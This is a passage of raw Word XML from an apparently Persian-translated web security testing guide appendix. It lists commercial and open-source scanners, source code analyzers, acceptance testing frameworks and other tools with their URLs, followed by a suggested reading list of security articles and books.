        <w:jc w:val="center"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68617C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>ابزارها</w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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ی</w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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 xml:space="preserve"> تست تجار</w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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ی</w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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 xml:space="preserve"> جعبه س</w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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ی</w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>اه</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D0888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lastRenderedPageBreak/>
        <w:t>Typhon - http://www.ngssoftware.com/products/internet-security/ngs-typhon.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBD50CE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NGSSQuirreL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- http://www.ngssoftware.com/products/database-security/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD1AB00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Watchfire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</w:t>
      </w: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AppScan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- http://www.watchfire.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A19BC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Cenzic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Hailstorm - http://www.cenzic.com/products_services/cenzic_hailstorm.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA0900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SPI Dynamics </w:t>
      </w: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WebInspect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- http://www.spidynamics.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02983EB0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Burp Intruder - http://portswigger.net/intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A998D1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Acunetix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Web Vulnerability Scanner - http://www.acunetix.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76584A37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ScanDo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- http://www.kavado.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34240AFB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WebSleuth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- http://www.sandsprite.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C60158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NT Objectives </w:t>
      </w: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NTOSpider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- http://www.ntobjectives.com/products/ntospider.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E75B7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Fortify Pen Testing Team Tool - http://www.fortifysoftware.com/products/tester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966EB23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Sandsprite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Web Sleuth - http://sandsprite.com/Sleuth/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5768B7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MaxPatrol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Security Scanner - http://www.maxpatrol.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70592DDD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Ecyware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</w:t>
      </w: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GreenBlue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Inspector - http://www.ecyware.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28415B04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Parasoft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</w:t>
      </w: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WebKing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(more QA-type tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D794C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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>MatriXay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> - http://www.dbappsecurity.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D335870" w14:textId="77777777" w:rsidR="00BC187D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rtl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N-Stalker Web Application Security Scanner - http://www.nstalker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D49608" w14:textId="77777777"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78C8679" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="0068617C" w:rsidRDefault="0068617C" w:rsidP="0068617C">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"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68617C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آنالیزور های </w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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 xml:space="preserve">کد منبع - منبع باز / </w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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نرم افزار آزاد</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150FBA6F" w14:textId="77777777"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176FEC13" w14:textId="77777777" w:rsidR="0068617C" w:rsidRPr="00082506" w:rsidRDefault="0068617C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OWASP LAPSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC04DC6" w14:textId="77777777" w:rsidR="0068617C" w:rsidRPr="00082506" w:rsidRDefault="0068617C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PMD - http://pmd.sourceforge.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B747999" w14:textId="77777777" w:rsidR="0068617C" w:rsidRPr="00082506" w:rsidRDefault="0068617C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FlawFinder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http://www.dwheeler.com/flawfinder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69C62A" w14:textId="77777777" w:rsidR="0068617C" w:rsidRPr="00082506" w:rsidRDefault="0068617C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Microsoft’s </w:t>
      </w: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FxCop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AE3FC18" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRDefault="0068617C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Splint - </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00082506" w:rsidRPr="001D768B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:bidi="fa-IR"/>
          </w:rPr>
          <w:t>http://splint.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="774AFF74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Boon - http://www.cs.berkeley.edu/~daw/boon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13370412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Pscan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http://www.striker.ottawa.on.ca/~aland/pscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3F4FD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rtl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FindBugs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http://findbugs.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA6E91" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRDefault="00082506" w:rsidP="00082506">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068617C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">آنالیزور های </w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C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>کد منبع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- تجاری</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7096A7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Fortify - http://www.fortifysoftware.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205066C0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Ounce labs </w:t>
      </w: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Prexis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http://www.ouncelabs.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782A4AC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Veracode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http://www.veracode.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F43AEA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GrammaTech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http://www.grammatech.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29851A72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ParaSoft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http://www.parasoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72544F91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ITS4 - http://www.cigital.com/its4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D6ACF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CodeWizard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http://www.parasoft.com/products/wizard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117747DE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Armorize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CodeSecure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http://www.armorize.com/product/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280CB9C3" w14:textId="77777777" w:rsidR="00BC187D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rtl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Checkmarx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CxSuite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http://www.checkmarx.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F2477" w14:textId="77777777"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1066ACAB" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="00082506" w:rsidRDefault="00082506" w:rsidP="00082506">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"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082506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>ابزار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های</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> تست 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قبولی</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506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 xml:space="preserve"> - منبع باز</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFAE1E1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Acceptance testing tools are used to validate the functionality of web applications. Some follow a scripted approach and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB852B3" w14:textId="77777777" w:rsidR="00082506" w:rsidRPr="00082506" w:rsidRDefault="00082506" w:rsidP="00082506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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>typically</w:t>
      </w:r>
      <w:proofErr w:type="gram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make use of a Unit Testing framework to construct test suites and test cases. Most, if not all, can be adapted to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36496E53" w14:textId="77777777" w:rsidR="00082506" w:rsidRPr="00082506" w:rsidRDefault="00082506" w:rsidP="00082506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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:proofErr w:type="gram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security specific tests in addition to functional tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A4310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WATIR - http://wtr.rubyforge.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B9FA5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A Ruby-based web testing framework that provides an interface into Internet Explorer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337846D2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Windows only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841C3E0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HtmlUnit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http://htmlunit.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E043D31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A Java and JUnit based framework that uses the Apache </w:t>
      </w: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HttpClient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as the transport.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC7252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Very robust and configurable and is used as the engine for a number of other testing tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA6E76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jWebUnit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http://jwebunit.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C60F5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A Java based meta-framework that uses </w:t>
      </w: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htmlunit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or selenium as the testing engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75008AC4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Canoo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Webtest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http://webtest.canoo.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D87365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An XML based testing tool that provides a facade on top of </w:t>
      </w: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htmlunit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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACFBCA2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No coding is necessary as the tests are completely specified in XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8495FB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There is the option of scripting some elements in Groovy if XML does not suffice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A6CDE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lastRenderedPageBreak/>
        <w:t>Very actively maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AF3A57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HttpUnit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http://httpunit.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E168F" w14:textId="77777777" w:rsidR="00082506" w:rsidRPr="00082506" w:rsidRDefault="00082506" w:rsidP="00082506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1080"/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One of the first web testing frameworks, suffers from using the native JDK provided HTTP transport, which can be a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fa-IR"/>
        </w:rPr>
        <w:t>bit limiting for security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</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13946EED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Watij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http://watij.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4070410E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A Java implementation of WATIR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C9073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Windows only because it uses IE for its tests (Mozilla integration is in the works).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE67DE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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Solex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 - http://solex.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A36C32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An Eclipse plugin that provides a graphical tool to record HTTP sessions and make assertions based on the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A64A6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Selenium - http://www.openqa.org/selenium/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B740DC5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JavaScript based testing framework, cross-platform and provides a GUI for creating tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4113C2" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00082506" w:rsidP="00836142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Mature and popular tool, but the use of JavaScript could </w:t>
      </w:r>
      <w:r w:rsidR="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">hamper certain security tests. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FE778" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7FD94E" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ابزارها</w:t>
      </w:r>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> د</w:t>
      </w:r>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گر</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C08910" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A56EAE0" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Runtime Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D78D4" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Rational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PurifyPlus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00EA49A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www-306.ibm.com/software/awdtools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F91349B" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr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  <w:t>Binary Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C051D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BugScam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 - http://sourceforge.net/projects/bugscam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CE51A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BugScan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 - http://www.hbgary.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DFFCC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Veracode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 - http://www.veracode.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFAF792" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr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  <w:t>Requirements Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F87A4D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Rational Requisite Pro - http://www-306.ibm.com/software/awdtools/reqpro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0178A2C9" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr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  <w:t>Site Mirroring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C099F16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wget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 - http://www.gnu.org/software/wget, http://www.interlog.com/~tcharron/wgetwin.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6828CCF5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lastRenderedPageBreak/>
        <w:t>curl - http://curl.haxx.se</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BC0AA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Sam Spade - http://www.samspade.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752AF9E5" w14:textId="77777777" w:rsid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Xenu - </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00EA49A8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http://home.snafu.de/tilman/xenulink.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CC1B29E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7DEE12F7" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">پیوست </w:t>
      </w:r>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00836142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>: خواندنی های پیشنهادی</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A7715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76972316" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142">
      <w:pPr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 w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>مقاله ها</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A079E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Security in the SDLC (NIST) - http://csrc.nist.gov/publications/nistpubs/800-64/NIST-SP800-64.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A72FF5B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The OWASP Guide to Building Secure Web Applications - http://www.owasp.org/index.php/Category:OWASP_Guide_Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB206D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The Economic Impacts of Inadequate Infrastructure for Software Testing - http://www.nist.gov/director/prog-ofc/report02-3.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7AB52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Threats and Countermeasures: Improving Web Application Security -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D44BB2" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142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http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/threatcounter.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C68BC83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Web Application Security is Not an Oxy-Moron, by Mark </w:t>
      </w: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Curphey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 - http://www.sbq.com/sbq/app_security/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914C70E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The Security of Applications: Not All Are Created Equal -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D253948" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142" w:rsidP="00836142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http://www.atstake.com/research/reports/acrobat/atstake_app_unequal.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581346C9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The Security of Applications Reloaded - http://www.atstake.com/research/reports/acrobat/atstake_app_reloaded.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F7FBB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Use Cases: Just the FAQs and Answers - http://www106.ibm.com/developerworks/rational/library/content/RationalEdge/jan03/UseCaseFAQS_TheRationalEdge_Jan2003.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A242CA8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58D20F75" w14:textId="77777777" w:rsidR="00836142" w:rsidRP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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>کتاب ها</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7E109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James S. Tiller: "The Ethical Hack: A Framework for Business Value Penetration Testing", </w:t>
      </w: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Auerbach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, ISBN: 084931609X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70CE76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Susan Young, Dave </w:t>
      </w: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Aitel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: "The Hacker's Handbook: The Strategy behind Breaking into and Defending Networks", </w:t>
      </w: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Auerbach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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD8DEA" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142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ISBN: 0849308887</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A0607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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Secure Coding, by Mark Graff and Ken Van </w:t>
      </w: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Wyk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, published by O’Reilly, ISBN 0596002424(2003) - http://www.securecoding.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3600F9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Building Secure Software: How to Avoid Security Problems the Right Way, by Gary McGraw and John </w:t>
      </w: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Viega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, published by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D046C5" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142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Addison-Wesley Pub Co, ISBN 020172152X (2002) - http://www.buildingsecuresoftware.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937C636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Writing Secure Code, by Mike Howard and David LeBlanc, published by Microsoft Press, ISBN 0735617228 (2003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBBECDE" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142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http://www.microsoft.com/mspress/books/5957.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037AE608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Innocent Code: A Security Wake-Up Call for Web Programmers, by </w:t>
      </w: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Sverre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 </w:t>
      </w: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Huseby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, published by John Wiley &amp; Sons, ISBN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD76B2B" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142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0470857447(2004) - http://innocentcode.thathost.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F37152F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Exploiting Software: How to Break Code, by Gary McGraw and Greg </w:t>
      </w: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Hoglund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, published by Addison-Wesley Pub Co, ISBN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F346744" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142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0201786958 (2004) -http://www.exploitingsoftware.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A8893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Secure Programming for Linux and Unix HOWTO, David Wheeler (2004) - http://www.dwheeler.com/secure-programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A064652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Mastering the Requirements Process, by Suzanne Robertson and James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Robertsonn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, published by Addison-Wesley Professional,</w:t>
      </w:r>
    </w:p>
